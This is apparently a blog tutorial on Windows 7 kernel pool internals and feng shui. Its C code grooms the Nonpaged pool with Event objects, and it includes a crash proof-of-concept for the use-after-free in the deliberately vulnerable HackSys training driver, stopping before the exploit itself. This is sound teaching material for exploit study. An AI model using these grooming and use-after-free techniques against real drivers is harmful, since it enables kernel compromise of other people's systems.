Windows Kernel Exploitation Part 4: Introduction to Windows Kernel Pool Exploitation

In this post I'm going to cover exploiting the Use-After-Free and Pool Overflow issues in the HackSys Team Extremely Vulnerable Driver. However, in order to explain this properly, an understanding Windows kernel memory management is needed. As such this post will cover the following:

  1. An overview of Windows kernel memory allocation
  2. A walkthrough on Windows kernel pool Fengshui
  3. Exploiting the HackSys Team Extremely Vulnerable Driver Use-After-Free
  4. Exploiting the HackSys Team Extremely Vulnerable Driver Pool overflow via two different methods

As with the previous examples, this post is focused on Windows 7, Service Pack 1, 32 bits.

Windows Kernel Pools

Some basic knowledge of how memory management works will be helpful here, if you've never looked at Virtual Memory and Paging before, its worth giving the following a quick read:

  1. Anatomy of a Program in Memory
  2. How the Kernel Manages Your Memory

The Windows kernel uses two types of dynamically sized 'pools' to allocate system memory, these are the kernels equivalent to the Heap in User Mode. I'm only going to cover enough details to understand how the exploits later work, for more info check out:

  1. Kernel Pool Exploitation on Windows 7 by Tarjei Mandt
  2. Windows Internals Seventh Edition Part 1 Chapter 5 or Windows Internals Sixth Edition Part 2 Chapter 10 Memory Management
  3. Memory Management for Windows Drivers

On Windows there are two key types of pool, the Nonpaged pool and the paged Pool. There's also the Special pool which I'll cover while walking through the Use After Free exploit and the Session pool which is used by win32k and won't be covered here.

Paged vs Non-Paged Pools

The Nonpaged pool is made up of memory which is guaranteed to always be stored in physical memory, whereas memory allocated within the Paged pool can be paged out. This is required because some kernel structures need to be accessible at IRQLs higher than that at which page faults can be satisfied. More details on IRQLs and what actions are supported at each level can be found at Managing Hardware Priorities.

This means that the Nonpaged pool is used to store key control structures such as Processes, Threads, Semaphores etc. Meanwhile the Paged pool is used to store file mappings, object handles, etc. The Paged pool actually consists of several separate pools, whereas at least on Windows 7, there is only one Nonpaged pool.

In order to allocate pool memory, generally drivers and the kernel will use the ExAllocatePoolWithTag function, the definition of which is next.

PVOID ExAllocatePoolWithTag(
  _In_ POOL_TYPE PoolType,
  _In_ SIZE_T    NumberOfBytes,
  _In_ ULONG     Tag
);

The PoolType argument consists of a value from the POOL_TYPE enum. This defines exactly what type of pool memory is being requested, we'll mostly be seeing it called with 0 which corresponds to the Nonpaged pool.

typedef enum _POOL_TYPE { 
  NonPagedPool,
  NonPagedPoolExecute                   = NonPagedPool,
  PagedPool,
  NonPagedPoolMustSucceed               = NonPagedPool + 2,
  DontUseThisType,
  NonPagedPoolCacheAligned              = NonPagedPool + 4,
  PagedPoolCacheAligned,
  NonPagedPoolCacheAlignedMustS         = NonPagedPool + 6,
  MaxPoolType,
  NonPagedPoolBase                      = 0,
  NonPagedPoolBaseMustSucceed           = NonPagedPoolBase + 2,
  NonPagedPoolBaseCacheAligned          = NonPagedPoolBase + 4,
  NonPagedPoolBaseCacheAlignedMustS     = NonPagedPoolBase + 6,
  NonPagedPoolSession                   = 32,
  PagedPoolSession                      = NonPagedPoolSession + 1,
  NonPagedPoolMustSucceedSession        = PagedPoolSession + 1,
  DontUseThisTypeSession                = NonPagedPoolMustSucceedSession + 1,
  NonPagedPoolCacheAlignedSession       = DontUseThisTypeSession + 1,
  PagedPoolCacheAlignedSession          = NonPagedPoolCacheAlignedSession + 1,
  NonPagedPoolCacheAlignedMustSSession  = PagedPoolCacheAlignedSession + 1,
  NonPagedPoolNx                        = 512,
  NonPagedPoolNxCacheAligned            = NonPagedPoolNx + 4,
  NonPagedPoolSessionNx                 = NonPagedPoolNx + 32
} POOL_TYPE;

The second argument is the number of bytes of Pool memory required and finally the PoolTag argument is a 32 bit value which is generally treated as 4 characters used to tag what the memory is used for, this is super handy when debugging and is also used by a lot of kernel memory instrumentation - tracking how many allocations have been made with a certain tag, breaking when memory is allocated with a certain tag, etc.

To free allocated pool memory the ExFreePoolWithTag function is generally used.

VOID ExFreePoolWithTag(
  _In_ PVOID P,
  _In_ ULONG Tag
);

This just requires a pointer to a valid pool allocation and the pool metadata will give it everything else needed, under standard conditions the pool tag provided won't be validated. However with the right debugging settings enabled the tag's will be validated and a BSOD will be triggered if they don't match. Now lets look into how these functions work under the hood.

Allocating Memory

At a first look in a dissassembler ExAllocatePoolWithTag is pretty intimidating.

Luckily Tarjei Mandt already did the work of turning the function into pseudo code in his paper, which acts as a nice guide. I'm going to use his pseudo code and some checking in IDA, with windbg, etc. to explain how the function works. His explanation is probably better and more accurate though, all the code snippets in this section are from the paper.

First of all the function checks if the number of bytes requested if over 4080 bytes and calls the Big Pool allocator if so.

// call pool page allocator if size is above 4080 bytes
if (NumberOfBytes > 0xff0) {  
// call nt!ExpAllocateBigPool
}

Here esi contains the requested number of bytes, if it's above 0xff0 it goes to nt!ExpAllocateBigPool. Otherwise the true branch is taken and processing continues.

if (PoolType & PagedPool) {  
    if (PoolType & SessionPool && BlockSize <= 0x19) {
        // try the session paged lookaside list
        // return on success
    } else if (BlockSize <= 0x20) {
        // try the per-processor paged lookaside list
        // return on success
    }
    // lock paged pool descriptor (round robin or local node)
}

At this point [esp+48h+var_20] holds the PoolType and'd with 1. So if the value is equal to 0 it's a Nonpaged pool, skipping the above if statement and going to the else shown in a minute, meanwhile if the type is for Paged pool memory the true branch is taken.

On the true branch it checks if the pool type is for the session pool.

It then immediately checks if the requested byte count is above 32.

Meanwhile on the false branch it also checks if the allocation is above 32 bytes.

If either check is passed, the logic gets a bit hairy so to give a brief overview, Tarjei's paper has more detail. The function will attempt to allocate the requested blocks by finding an entry on the Lookaside list for the relevant pool. The Lookaside list is a per processor structure for each pool, a reference to it is stored in the Kernel Processor Control Block. The Lookaside lists consist of singley linked lists of commonly requested memory sizes, for general Pool memory this is small allocations that will be made frequently. Using the Lookaside lists allows these frequent allocations to be made more rapidly. Other more specific lookaside lists exist for very frequently made fixed sized allocations.

If neither of the size checks were passed or allocating memory from the lookaside lists failed. The paged pool descriptor is locked, this is the same structure as used for the Nonpaged pool and is used in the same way, so I'll describe it later.

Now we have the code which is ran if the requested allocation is of a NonPaged pool type, here we took the false branch at loc_518175 above.

else { // NonPagedPool  
    if (BlockSize <= 0x20) {
        // try the per-processor non-paged lookaside list
        // return on success
    }
    // lock non-paged pool descriptor (local node)
}

Next the code will check the requested blocksize is less than or equal to 32 bytes as shown below. As above if the allocation is small enough it will attempt to use the lookaside list, returning if successful.

If the lookaside list cannot be used or the requested block size if greater than 32 bytes, the non-paged pool descriptor will be locked. First a pointer for the Nonpaged pool descriptor will be got, if there's more than 1 Nonpaged pool a lookup will be done.

First the index into the ExpNonPagedPoolDescriptor table will be calculated based on the number of Nonpaged pools available and the 'local node' (the paper explains this but basically each processor in a multi core system can have preferred local memory for performance reasons):
Here eax ends up holding the chosen index. Then a reference will be read from the table:

This is the same logic as for Paged pools, calculating the index and then getting a reference:
At this point the code paths for both paged and nonpaged allocations have reached the same point. The allocator will check if the page descriptor is locked and acquire a lock if not.

Now what does the descriptor structure actually consist of? Luckily it's included in the public symbols for Windows 7.

dt nt!_POOL_DESCRIPTOR  
   +0x000 PoolType         : _POOL_TYPE
   +0x004 PagedLock        : _KGUARDED_MUTEX
   +0x004 NonPagedLock     : Uint4B
   +0x040 RunningAllocs    : Int4B
   +0x044 RunningDeAllocs  : Int4B
   +0x048 TotalBigPages    : Int4B
   +0x04c ThreadsProcessingDeferrals : Int4B
   +0x050 TotalBytes       : Uint4B
   +0x080 PoolIndex        : Uint4B
   +0x0c0 TotalPages       : Int4B
   +0x100 PendingFrees     : Ptr32 Ptr32 Void
   +0x104 PendingFreeDepth : Int4B
   +0x140 ListHeads        : [512] _LIST_ENTRY

The (Non)PagedLock field is what we just saw being checked before the function definitely acquired a lock on the descriptor. The PoolType is self explanatory and the PoolIndex field indicates what entry in the ExpPagedPoolDescriptor or ExpNonPagedPoolDescriptors tables exported by the kernel a pointer to the structure can be found. The only other fields we really care about are PendingFrees and PendingFreeDepth which I'll explain in the next section and ListHeads which we need to look at now.

The ListHeads is a list of free blocks of memory of multiples of 8 bytes up to a large allocation. Each entry includes a LIST_ENTRY structure which is part of a linked list of blocks of the same size. The list is indexed by the requested block size + 8 (to make room for the POOL_HEADER, described in a second) divided by 8 to get the byte count. The allocator will go through the list starting at the entry of the exact size needed looking for a valid chunk to use, if it can't an exact fit, it looks for a larger entry and splits it. The pseudo code for this is below, again stolen from Tarjei Mandt's paper.

// attempt to use listheads lists
for (n = BlockSize-1; n < 512; n++) {  
    if (ListHeads[n].Flink == &ListHeads[n]) { // empty
        continue; // try next block size
    }
    // safe unlink ListHeads[n].Flink
    // split if larger than needed
    // return chunk
}

I gave up following the assembly properly at this point - it gets a bit mental and I'm not sure it'd add much (also this blogpost just topped 10k words...). However we could do with a bit more detail on what happens when the function actually successfully finds a chunk of memory that's of a correct size. Allocations made by the allocator are for the requested amount + 8 bytes, to make room for the POOL_HEADER mentioned previously. The structure is included in Windows 7's public symbols, so we can see it below.

dt nt!_POOL_HEADER  
   +0x000 PreviousSize     : Pos 0, 9 Bits
   +0x000 PoolIndex        : Pos 9, 7 Bits
   +0x002 BlockSize        : Pos 0, 9 Bits
   +0x002 PoolType         : Pos 9, 7 Bits
   +0x000 Ulong1           : Uint4B
   +0x004 PoolTag          : Uint4B
   +0x004 AllocatorBackTraceIndex : Uint2B
   +0x006 PoolTagHash      : Uint2B

The PreviousSize field is the size of the previous allocation in memory, this is used when freeing allocations to check for corruption. The PoolIndex field can be used to look up the POOL_DESCRIPTOR for the allocation, as explained earlier. The BlockSize is the total size of the allocation, including the header and finally the PoolType is just the value from the POOL_TYPE enum it was allocated with, or'd with 2 if the block is not free. The PoolTag is self explanatory.

Finally if the function failed to find space for the allocation in already allocated memory pages it will call MiAllocatePoolPages to create some more and return an address within the new memory.

// no chunk found, call nt!MiAllocatePoolPages
// split page and return chunk

As can be seen below.

Freeing Memory

This time I've just provided some comments on Tarjei Mandt's reversed code, I'm not sure the assembly snippets are adding much but happy to add to this if they were actually useful...this just has the components relevant to the exploits, see the paper for all the code and details.

The blocksize should be equal to the previous size field in the next pool objects header, if it isn't then memory has been corrupted and a BugCheck is triggered. When overwriting this structure we need to make sure the BlockSize is overwritten with the correct value or we'll get Blue Screens.

if (Entry->BlockSize != NextEntry->PreviousSize)  
    BugCheckEx(BAD_POOL_HEADER);

Then checks for paged pool type are made, I've skipped the Session part.

else if (Entry->BlockSize <= 0x20) {  
    if (Entry->PoolType & PagedPool) {
        // put in per-processor paged lookaside list
        // return on success
    }
else { // NonPagedPool  
    // put in per-processor non-paged lookaside list
    // return on success
}

If delayed free's are enabled then check to see if the pending list has >= 32 entried, if so free them all and add the current entry to the list.

if (ExpPoolFlags & DELAY_FREE) { // 0x200  
    if (PendingFreeDepth >= 0x20) {
        // call nt!ExDeferredFreePool
    }
// add Entry to PendingFrees list
}

We'll only be looking at systems with DefferedFree allowed so I'll skip the old merge logic. The logic in ExDeferredFreePool is fairly straight forward at a high level and the function is defined as below.

VOID ExDeferredFreePool( PPOOL_DESCRIPTOR PoolDesc, BOOLEAN bMultipleThreads)  

It takes in a pointer to the POOL_DESCRIPTOR which was locked by ExFreePoolWithTag earlier. It then loops through PendingFrees and free's each entry, if the next or previous entries are free then they'll be coalesced with the block currently being free'd.

Windows Kernel Pool Fengshui

In order to carry out kernel pool fengshui we need to allocate objects within the correct type of Pool and which are sizes which are useful to us. We know that key kernel data structures like Semaphores are stored in the Nonpaged Pool, which is also used by the HackSys driver for all the Pool based challenges. To start off with we need to find out some kernel structures which be allocated within the Nonpaged pool and there sizes. The easy way to do this is to allocate some controls objects and then use a kernel debugger to view the corresponding pool allocations. I used the following code to do this.

#include "stdafx.h"
#include <Windows.h>

//from https://www.nirsoft.net/kernel_struct/vista/UNICODE_STRING.html
typedef struct _UNICODE_STRING  
{
    WORD Length;
    WORD MaximumLength;
    WORD * Buffer;
} UNICODE_STRING, *PUNICODE_STRING;


//from https://www.nirsoft.net/kernel_struct/vista/OBJECT_ATTRIBUTES.html
typedef struct _OBJECT_ATTRIBUTES  
{
    ULONG Length;
    PVOID RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

//from https://github.com/JeremyFetiveau/Exploits/blob/master/MS10-058.cpp
#define IOCO 1
typedef NTSTATUS(__stdcall *NtAllocateReserveObject_t) (OUT PHANDLE hObject, IN POBJECT_ATTRIBUTES ObjectAttributes, IN DWORD ObjectType);

int main()  
{
    HMODULE hModule = LoadLibraryA("ntdll.dll");

    if (hModule == NULL) {
        printf("Couldn't load ntdll, how is computer running? : 0x%X\n", GetLastError());
        return 1;
    }

    NtAllocateReserveObject_t NtAllocateReserveObject = (NtAllocateReserveObject_t)GetProcAddress(hModule, "NtAllocateReserveObject");

    if (NtAllocateReserveObject == NULL) {
        printf("Couldn't get a reference to NtAllocateReserveObject in ntdll?!: 0x%X\n", GetLastError());
        return 1;
    }

    printf("NonPaged Pool objects:\r\n");
    HANDLE reserve = NULL;
    NtAllocateReserveObject(&reserve,0,IOCO);
    printf("\tReserve object: 0x%x\r\n", reserve);
    HANDLE event = CreateEvent(NULL, false, false, TEXT(""));
    printf("\tEvent object: 0x%x\r\n", event);
    HANDLE semaphore = CreateSemaphore(NULL, 0, 1, TEXT(""));
    printf("\tSemaphore object: 0x%x\r\n", semaphore);
    HANDLE mutex = CreateMutex(NULL, false, TEXT(""));
    printf("\tMutex object: 0x%x\r\n", mutex);
    getchar();
    DebugBreak();
    return 0;
}

Compiling and running this code gives the following output, then after hitting enter our attached kernel debugger should break.

Using the debugger we can find out where each structure resides in memory and how much memory is allocated for it. In windbg the !handle command can be entered to get the details for an object. Here I'm retrieving the Reserve object's details.

!handle 0x20
...
0020: Object: 85edb3c0  GrantedAccess: 000f0003 Entry: 86322040  
Object: 85edb3c0  Type: (843e3d20) IoCompletionReserve  
    ObjectHeader: 85edb3a8 (new version)
        HandleCount: 1  PointerCount: 1

Once we know the objects address we can look up it's pool details using the !pool command. Parsing 2 as it's second argument means it only shows the exact allocation we're interested in, removing the 2 will show us surrounding allocations within the page of memory.

kd> !pool 85edb3c0 2  
Pool page 85edb3c0 region is Nonpaged pool  
*85edb390 size:   60 previous size:   30  (Allocated) *IoCo (Protected)
        Owning component : Unknown (update pooltag.txt)

Here we can see that the Reserve object is allocated with a tag of 'IoCo' and takes up 60 bytes. Repeating this process for the other objects gives us the following.

Event:  
*8458e540 size:   40 previous size:   b8  (Allocated) *Even (Protected)

Semaphor:  
*86107538 size:   48 previous size:   10  (Allocated) *Sema (Protected)

Mutex:  
*84de7b48 size:   50 previous size:   50  (Allocated) *Muta (Protected)

Knowing the object sizes will be useful later when we need to ensure are a target object of a set size is allocated reliably in a gap in memory we've created. For now lets try to carry out pool grooming using Event objects which give us a pattern of free and allocated 0x40 byte pool blocks.

Since the allocater will allocate memory for objects by looking for free blocks before starting to allocate them on free pages, we need to start by filling of the existing 0x40 byte free blocks.

For example the below code will allocate five event objects.

#include "stdafx.h"
#include <Windows.h>

#define DEFRAG_EVENT_COUNT 5

int main()  
{

    HANDLE hDefragEvents[DEFRAG_EVENT_COUNT] = {0x0};
    for (unsigned int i = 0; i < DEFRAG_EVENT_COUNT; i++) {
        HANDLE hEvent = CreateEvent(NULL, false, false, TEXT(""));
        if (hEvent == NULL) {
            printf("Failed to create groom event 0x%X: 0x%X\r\n", i, GetLastError());
            return 1;
        }
        hDefragEvents[i] = hEvent;
    }
    printf("Last 5 Event handles:\r\n");
    for (unsigned int i = 0; i < 5; i++) {
        unsigned int index = DEFRAG_EVENT_COUNT - i;
        printf("\t Event handle %d: 0x%X", index, hDefragEvents[index]);
    }
    DebugBreak();
    for (unsigned int i = 0; i < DEFRAG_EVENT_COUNT; i++) {
        HANDLE hEvent = hDefragEvents[i];
        if (!CloseHandle(hEvent)) {
            printf("Failed to remove defrag event object 0x%X: 0x%X\r\n", hEvent, GetLastError());
            return 1;
        }
    }

    return 0;
}

Now if we build this code and run it with a kernel debugger attached, we can see the Handle's for the five event objects.

Examining the last two handles in windbg shows us that they are not allocated anywhere near each other.

!handle 0x34
...
0034: Object: 85d44de8  GrantedAccess: 001f0003 Entry: a9635068  
Object: 85d44de8  Type: (841bd440) Event  
    ObjectHeader: 85d44dd0 (new version)
        HandleCount: 1  PointerCount: 1


!handle 0x30
...
0030: Object: 84d32ee0  GrantedAccess: 001f0003 Entry: a9635060  
Object: 84d32ee0  Type: (841bd440) Event  
    ObjectHeader: 84d32ec8 (new version)
        HandleCount: 1  PointerCount: 1

Further viewing the pool information for the page on which the penultimate Event object was allocated, shows that it is just placed in the first available gap between two random objects.

kd> !pool 84d32ee0  
...
 84d32d98 size:   38 previous size:   40  (Allocated)  ViMm
 84d32dd0 size:   90 previous size:   38  (Allocated)  Ntfx
 84d32e60 size:   10 previous size:   90  (Free)       CcBc
 84d32e70 size:   40 previous size:   10  (Allocated)  Even (Protected)
*84d32eb0 size:   40 previous size:   40  (Allocated) *Even (Protected)
        Pooltag Even : Event objects
 84d32ef0 size:   18 previous size:   40  (Allocated)  AzBD
 84d32f08 size:   28 previous size:   18  (Allocated)  VadS
 84d32f30 size:   68 previous size:   28  (Allocated)  FMsl
 84d32f98 size:   28 previous size:   68  (Allocated)  VadS
 84d32fc0 size:   40 previous size:   28  (Allocated)  Even (Protected)

However if we increase DEFRAG_EVENT_COUNT to a much larger number, we get a very different story.

#define DEFRAG_EVENT_COUNT 20000

Again running it and viewing the last five handles.

Examining the handles in windbg we can see that they have been allocated contiguously in memory.

!handle 13930
...
13930: Object: 85c50a00  GrantedAccess: 001f0003 Entry: a6cc5260  
Object: 85c50a00  Type: (841bd440) Event  
    ObjectHeader: 85c509e8 (new version)
        HandleCount: 1  PointerCount: 1

!handle 1392c
...
1392c: Object: 85c50a40  GrantedAccess: 001f0003 Entry: a6cc5258  
Object: 85c50a40  Type: (841bd440) Event  
    ObjectHeader: 85c50a28 (new version)
        HandleCount: 1  PointerCount: 1

Examining the pool layout for the page both Event objects are allocated on, shows a long series of Event objects allocated contiguously. The deterministic nature of the memory allocator means that this will always happen eventually, if we allocate enough Event objects.

!pool 85c50a40
...
 85c509d0 size:   40 previous size:   40  (Allocated)  Even (Protected)
*85c50a10 size:   40 previous size:   40  (Allocated) *Even (Protected)
        Pooltag Even : Event objects
 85c50a50 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85c50a90 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85c50ad0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85c50b10 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85c50b50 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85c50b90 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85c50bd0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85c50c10 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85c50c50 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85c50c90 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85c50cd0 size:   40 previous size:   40  (Allocated)  Even (Protected)
...

Now we want to create 'holes' in the address space of a controlled size. At this point we know any more allocated event object will be allocated mostly contiguously, so by allocating a large number and then freeing every other object we should get a pattern of free and allocated objects.

I added the following code to the example above, where the loop printing the last five handles used to be.

HANDLE hGroomEvents[5000] = { 0x00 };

for (unsigned int i = 0; i < 5000; i++) {  
    HANDLE hEvent = CreateEvent(NULL, false, false, TEXT(""));
    if (hEvent == NULL) {
        printf("Failed to create groom event 0x%X: 0x%X\r\n", i, GetLastError());
        return 1;
    }
    hGroomEvents[i] = hEvent;
}

for (unsigned int i = 0; i < 5000; i+=2) {  
    HANDLE hEvent = hGroomEvents[i];
    if (!CloseHandle(hEvent)) {
        printf("Failed to remove defrag event object 0x%X: 0x%X\r\n", hEvent, GetLastError());
        return 1;
    }
}
printf("Example Event handle: 0x%X\r\n", hGroomEvents[4443]);  
getchar();  
DebugBreak();  
for (unsigned int i = 1; i < 5000; i += 2) {  
    HANDLE hEvent = hGroomEvents[i];
    if (!CloseHandle(hEvent)) {
        printf("Failed to remove defrag event object 0x%X: 0x%X\r\n", hEvent, GetLastError());
        return 1;
    }
}

Running it we get an example handle printed out from a vaguely random index into the remaining handles.

Examining the handle in windbg allows us to find it's address in memory.

!handle 17ecc
...
17ecc: Object: 85d3ba30  GrantedAccess: 001f0003 Entry: 87e88d98  
Object: 85d3ba30  Type: (841bd440) Event  
    ObjectHeader: 85d3ba18 (new version)
        HandleCount: 1  PointerCount: 1

Once we know the allocations address, we can again view the pool layout of the page it is allocated on. Here we can see that we've successfully created a pattern of free and allocated Event objects.

!pool 85d3ba30  
...
 85d3b7c0 size:   40 previous size:   40  (Free)       Even
 85d3b800 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85d3b840 size:   40 previous size:   40  (Free)       Even
 85d3b880 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85d3b8c0 size:   40 previous size:   40  (Free)       Even
 85d3b900 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85d3b940 size:   40 previous size:   40  (Free)       Even
 85d3b980 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85d3b9c0 size:   40 previous size:   40  (Free)       Even
*85d3ba00 size:   40 previous size:   40  (Allocated) *Even (Protected)
        Pooltag Even : Event objects
 85d3ba40 size:   40 previous size:   40  (Free)       Even
 85d3ba80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85d3bac0 size:   40 previous size:   40  (Free)       Even
 85d3bb00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85d3bb40 size:   40 previous size:   40  (Free)       Even
 85d3bb80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85d3bbc0 size:   40 previous size:   40  (Free)       Even
 85d3bc00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85d3bc40 size:   40 previous size:   40  (Free)       Even
 85d3bc80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85d3bcc0 size:   40 previous size:   40  (Free)       Even
 85d3bd00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85d3bd40 size:   40 previous size:   40  (Free)       Even
 85d3bd80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85d3bdc0 size:   40 previous size:   40  (Free)       Even
 85d3be00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 85d3be40 size:   40 previous size:   40  (Free)       Even
...

For objects/allocations we can't find a corresponding kernel object the same size as, we can use multiple copies of an object of a dividing size or attempt something more elaborate.

HackSysTeam Extremely Vulnerable Driver Use-After-Free Exploitation

A Use-After-Free (UAF) vulnerability occurs when (shockingly) memory is used after it has already been free'd. By finding somewhere where code does this, it may be possible to replace the free'd memory with something else. Then when the memory is referenced and the code thinks one structure/object is there, another is. By placing the right new data where the free memory is, code execution can be gained.

The Vulnerability

As I just explained in order to exploit a UAF we need the following:

  1. A way to create an object
  2. A way to free the object
  3. A way to replace it
  4. A way to cause the replacement to be referenced as if it was the original

As before a brief look at the driver in IDA shows us all our needs are provided for, I'll start by covering points 1,2 and 4 as they'll let us develop a crash PoC. First off we need a way to create an object in kernel memory using the driver, looking at the IOCTL dispatch function shows us a function call proceeded by logging the following string: ****** HACKSYS_EVD_IOCTL_CREATE_UAF_OBJECT ******. This sounds like it'll be what we're looking for.

Taking a look at the function itself, we see that allocates 0x58 bytes of memory on the Nonpaged pool.

If this allocation is successful it goes onto load values into the memory and save a reference to it, in a global variable.

At 1 the function is setting all of the allocated memory to be filled with '0x41' bytes. Then loads a 0 byte into the last byte of the memory. The function pointer loaded into the first four bytes of the object at 3 is a simple function which logs that it has been called.

Finally at 4 the driver saves a pointer to the memory in the global variable named P.

Now we can create the object, we need a way to free it. The function call in the IOCTL dispatch function preceded by logging ****** HACKSYS_EVD_IOCTL_FREE_UAF_OBJECT ****** is probably a good call.

Looking at the function itself we can see it doesn't take any input, instead operating on the reference stored by the last function we looked at.

Once called the function checks that the global pointer 'P' referenced in the create function isn't null at 1 before proceeding to call ExFreePoolWithTag on it at 2.

Onto our third requirement - a way to make the driver reference the free'd object in some way, luckily ****** HACKSYS_EVD_IOCTL_USE_UAF_OBJECT ****** sounds like it'll do the trick.

Looking at the function we can see that it attempts to call the function pointer loaded into the first four bytes of the UAF object by the create function.

Here at 1, it's making sure that P contains a pointer to an object and isn't a null pointer. It then loads the first four bytes of memory into eax and makes sure they aren't null bytes at 2. If both these checks were successful then the callback is called at 3.

Working out the required IOCTL codes gives us the three IOCTL codes we need.

#define HACKSYS_EVD_IOCTL_ALLOCATE_UAF_OBJECT             CTL_CODE(FILE_DEVICE_UNKNOWN, 0x804, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)
#define HACKSYS_EVD_IOCTL_USE_UAF_OBJECT                  CTL_CODE(FILE_DEVICE_UNKNOWN, 0x805, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)
#define HACKSYS_EVD_IOCTL_FREE_UAF_OBJECT                 CTL_CODE(FILE_DEVICE_UNKNOWN, 0x806, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)

Developing a crash PoC

In order to reliably detect that a UAF has occurred, I used some of the Windows kernels pool debugging functionality. In this case enabling special pool for the
HackSysExtremeVulnerableDriver using the command shown below.

verifier /volatile /flags 0x1 /adddriver HackSysExtremeVulnerableDriver.sys  

If this has run successfully we should see the following output.

When a binary with special pool enabled calls the ExAllocatePoolWithTag function, it will use the ExAllocatePoolWithTagSpecialPool function to allocate memory instead of following it's standard logic. As shown below.

The ExFreePoolWithTag function has matching logic. Special pool works by being a literal separate memory pool backed by separate pages of memory. There's a few different options for special pool, as explained here. By default it is in verify end mode which in brief means that all allocations made by the driver are placed as close to the end of a page of memory as possible and the following and previous pages are marked as inaccessible. This means that if the driver attempts to access memory beyond the end of the allocation an error will be triggered. Additionally the unused memory on the page is marked with special patterns, so that if these are corrupted the error can be detected when the memory is free'd.

Additionally special pool will mark memory it has free'd and avoid reallocating it for as long as possible. If the free'd memory is referenced it will trigger an error. This causes a huge performance impact for the driver, so it's only enabled when debugging memory issues.

With special pool enabled, we can create a simple crash proof of concept for the vulnerability. The below code will create the UAF object, free it and then cause it to be referenced. If the driver does reference the free'd memory this should trigger a blue screen due to special pools debugging features.

#include "stdafx.h"
#include <Windows.h>

#define HACKSYS_EVD_IOCTL_ALLOCATE_UAF_OBJECT             CTL_CODE(FILE_DEVICE_UNKNOWN, 0x804, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)
#define HACKSYS_EVD_IOCTL_USE_UAF_OBJECT                  CTL_CODE(FILE_DEVICE_UNKNOWN, 0x805, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)
#define HACKSYS_EVD_IOCTL_FREE_UAF_OBJECT                 CTL_CODE(FILE_DEVICE_UNKNOWN, 0x806, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)

int _tmain(int argc, _TCHAR* argv[])  
{
    DWORD dwBytesReturned;
    LPCWSTR lpDeviceName = TEXT("\\\\.\\HackSysExtremeVulnerableDriver");

    printf("Getting the device handle\r\n");
    //HANDLE WINAPI CreateFile( _In_ lpFileName, _In_ dwDesiredAccess, _In_ dwShareMode, _In_opt_ lpSecurityAttributes,
    //_In_ dwCreationDisposition, _In_ dwFlagsAndAttributes, _In_opt_ hTemplateFile );
    HANDLE hDriver = CreateFile(lpDeviceName,           //File name - in this case our device name
        GENERIC_READ | GENERIC_WRITE,                   //dwDesiredAccess - type of access to the file, can be read, write, both or neither. We want read and write because thats the permission the driver declares we need.
        FILE_SHARE_READ | FILE_SHARE_WRITE,             //dwShareMode - other processes can read and write to the driver while we're using it but not delete it - FILE_SHARE_DELETE would enable this.
        NULL,                                           //lpSecurityAttributes - Optional, security descriptor for the returned handle and declares whether inheriting processes can access it - unneeded for us.
        OPEN_EXISTING,                                  //dwCreationDisposition - what to do if the file/device doesn't exist, in this case only opens it if it already exists, returning an error if it doesn't.
        FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED,   //dwFlagsAndAttributes - In this case the FILE_ATTRIBUTE_NORMAL means that the device has no special file attributes and FILE_FLAG_OVERLAPPED means that the device is being opened for async IO.
        NULL);                                          //hTemplateFile - Optional, only used when creating a new file - takes a handle to a template file which defineds various attributes for the file being created.

    if (hDriver == INVALID_HANDLE_VALUE) {
        printf("Failed to get device handle :( 0x%X\r\n", GetLastError());
        return 1;
    }

    printf("Got the device Handle: 0x%X\r\n", hDriver);
    DeviceIoControl(hDriver, HACKSYS_EVD_IOCTL_ALLOCATE_UAF_OBJECT, NULL, 0, NULL, 0, &dwBytesReturned, NULL);

    printf("UAF object created.\r\n");

    DeviceIoControl(hDriver, HACKSYS_EVD_IOCTL_FREE_UAF_OBJECT, NULL, 0, NULL, 0, &dwBytesReturned, NULL);

    printf("UAF object free'd.\r\n");

    DeviceIoControl(hDriver, HACKSYS_EVD_IOCTL_USE_UAF_OBJECT, NULL, 0, NULL, 0, &dwBytesReturned, NULL);

    printf("UAF object used.\r\n");
    printf("Exploit complete, cleaning up\n");
    CloseHandle(hDriver);
    return 0;
}

Now compile and run it and...

Rebooting the system with a kernel debugger attached, re-enabling special pool and re-running the PoC allows us to check the crash was caused by the free'd memory being referenced.

The !analyze -v output immediately tells us that the crash is likely due to free'd memory being referenced, looking further into the analyze output we can see that the crashing instruction is the push [eax] instruction seen earlier in the IOCTL which called the UAF objects callback function.

Examining the pool details of the memory address that the driver attempted to access again confirms the memory has probably been previously free'd.

Turning it into an Exploit

